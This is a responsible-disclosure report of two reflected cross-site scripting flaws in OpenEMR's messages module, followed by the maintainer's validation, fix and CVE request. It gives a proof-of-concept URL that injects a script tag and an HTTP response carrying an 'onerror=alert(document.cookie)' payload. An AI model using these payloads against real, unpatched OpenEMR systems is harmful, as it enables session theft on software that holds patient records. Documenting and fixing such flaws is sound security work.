Multiple Reflected Cross-Site Scripting in Messages Module in openemr/openemr


Reported on

Oct 6th 2022


The first occurrence affects messages.php file. The parameter stage was not properly encoded before being printed as HTML. This occurs when go parameter is set to setup value.

The second instance affects save.php file. There was a POST parameter called parameter in JSON format that was being printed as-is in a JSON response but using an HTML content-type header.

Proof of Concept

The first instance can be exploited by accesing http://openemr.vuln/interface/main/messages/messages.php?go=setup&stage=%3Cscript%20src=//

The following HTML code will be generated:

369: <title>MedEx Setup</title><br /><span class='title'><script src=//></script> Warning: This is not a valid request.</span></body>

The second instance can be exploited by sending the following request:

POST /openemr/interface/main/messages/save.php?action=process HTTP/1.1
Host: xxxxxxx


That generated this response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8

{"xss":"<img src=x onerror=alert(document.cookie)>"}

As it was being interpreted as HTML content, the payload will be executed.


This vulnerability allows a remote attacker gain control on the victims browser when a malicious link is clicked. The attacker could be able to steal the session cookie, trick the user to enter their credentials or, in general, take control on the web application flow.

We are processing your report and will contact the openemr team within 24 hours. a year ago
xkulio modified the report
a year ago
xkulio modified the report
a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
We have sent a follow up to the openemr team. We will try again in 7 days. a year ago
openemr/openemr maintainer has acknowledged this report a year ago
Brady Miller validated this vulnerability a year ago
xkulio has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller marked this as fixed in with commit 37d7ed a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
messages.php#L112-L122 has been validated
save.php#L224-L251 has been validated
Brady Miller published this vulnerability a year ago
Brady Miller
a year ago

@admin, please assign a CVE. thanks!

to join this conversation